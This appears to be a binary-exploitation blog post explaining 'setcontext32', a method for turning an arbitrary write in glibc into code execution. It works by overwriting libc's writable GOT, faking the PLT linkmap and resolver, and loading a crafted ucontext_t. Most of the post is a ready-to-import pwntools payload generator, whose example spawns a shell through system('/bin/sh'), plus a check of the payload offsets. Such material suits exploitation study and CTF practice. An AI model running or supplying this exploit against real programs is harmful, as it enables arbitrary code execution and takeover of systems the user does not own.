# modern arb write -> rce is hard

Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of `__free_hook` are long gone; now you've got to leak the pointer mangling cookie to modify an existing `__exit_funcs` entry, maybe compute the offset to `ld.so` to overwrite `l_addr` and create a fake `DT_FINI` entry, or perhaps set up special `_codecvt` and `_wide_data` structures on hijacked IO objects...

I'd just like to specify the function I want to call and its arguments!

I want a *flexible* RCE primitive. I don't want to rely on `_IO_cleanup`, `_dl_fini`, or `malloc` to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called even with the most messed-up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray `system` is stack aligned. I don't want to satisfy several constraints so `one_gadget` will work!

# setcontext32

setcontext32 is a neat method to convert an arbitrary write into flexible arbitrary code execution. Roughly, it looks like:

```python=
write(libc_write_address, flat(
    p64(0),
    p64(libc_write_address + 0x218),  # fake linkmap: points at cpu_state_information
    p64(setcontext+32),               # fake runtime resolver
    p64(libc_exe_address) * 0x40,     # every GOT entry -> PLT trampoline
    cpu_state_information,
))
```

Here `libc_write_address` is the start of the writeable page in libc, `libc_exe_address` is the start of the executable page in libc, and `cpu_state_information` is a `ucontext_t`-shaped structure holding the value of every register to load, including `rsp` and `rip`.

## high level overview

Every GOT entry in libc, such as `memset`, `memcpy`, `strcpy`, and `strlen`, is replaced with the address of the PLT trampoline, which sits at the beginning of the executable page. The PLT trampoline pushes the linkmap pointer and jumps to the runtime resolver, both of which it reads from the beginning of the writeable page. After the write, the linkmap pointer is the fake `libc_write_address + 0x218` and the resolver is the fake `setcontext+32`. `setcontext+32` pops `libc_write_address + 0x218` off the stack and treats it as a pointer to a saved `ucontext_t`. It then loads your structure as the current CPU state.

Calling most libc functions will trigger setcontext32, including `malloc`, `exit`, and (almost?) every IO operation.

## why

libc's GOT is writeable so that libc can pick architecture-specific implementations at runtime, such as a `memcpy` optimized for SSE or AVX512. A friend also guessed that it could be for `ltrace`. I learned the libc GOT was writeable from pwndbg creator [disconnect3d](https://twitter.com/disconnect3d_pl).

## code

Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). The `__main__` block at the bottom is an example.

`setcontext32.py`
```python=
from pwn import *


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    # src is the address this structure will live at in memory.
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr (must point at readable memory)
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr (0x1F80 is the default MXCSR value)

    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)

    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)

    return b


def setcontext32(libc: ELF, **kwargs) -> tuple[int, bytes]:
    # Returns (address to write to, payload bytes). libc.address must already
    # be set to the leaked base, otherwise every address is relative to 0.
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    return got, flat(
        p64(0),
        p64(got + 0x218),  # fake linkmap -> the ucontext below
        p64(libc.symbols["setcontext"] + 32),  # fake runtime resolver
        p64(plt_trampoline) * 0x40,
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )


if __name__ == "__main__":
    libc = ELF("./libc.so.6")
    dest, payload = setcontext32(
        libc, rip=libc.sym["system"], rdi=next(libc.search(b"/bin/sh"))
    )
    print(hex(dest), payload.hex())
```
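
The `0x218` offset in the payload falls out of its layout: three header qwords (the unused first slot, the fake linkmap pointer, the fake resolver) followed by `0x40` trampoline pointers, so the `ucontext_t` starts `8 * (3 + 0x40) = 0x218` bytes into the write. Here's a minimal sketch that checks this arithmetic using only `struct`. The helper name `payload_prefix` and the addresses are made up for illustration; they are not part of `setcontext32.py` and don't come from a real libc.

```python
import struct

HEADER_QWORDS = 3         # first slot, linkmap slot, resolver slot
TRAMPOLINE_SLOTS = 0x40   # function slots overwritten, as in the payload above


def payload_prefix(got: int, setcontext: int, plt0: int) -> tuple[int, bytes]:
    """Return (ucontext address, the bytes that precede the ucontext)."""
    ucontext_addr = got + 8 * (HEADER_QWORDS + TRAMPOLINE_SLOTS)
    # Header: zero, fake linkmap (-> ucontext), fake resolver (setcontext+32).
    header = struct.pack("<3Q", 0, ucontext_addr, setcontext + 32)
    # Every following slot points back at the PLT trampoline.
    slots = struct.pack("<Q", plt0) * TRAMPOLINE_SLOTS
    return ucontext_addr, header + slots


if __name__ == "__main__":
    # Placeholder addresses for illustration only.
    GOT, SETCONTEXT, PLT0 = 0x7F0000219000, 0x7F0000050000, 0x7F0000028000
    addr, prefix = payload_prefix(GOT, SETCONTEXT, PLT0)
    print(hex(addr - GOT), hex(len(prefix)))  # prints: 0x218 0x218
```

If you change the number of trampoline slots you overwrite, the linkmap pointer and the `src` argument to `create_ucontext` have to move with it, since both must point at wherever the structure actually lands.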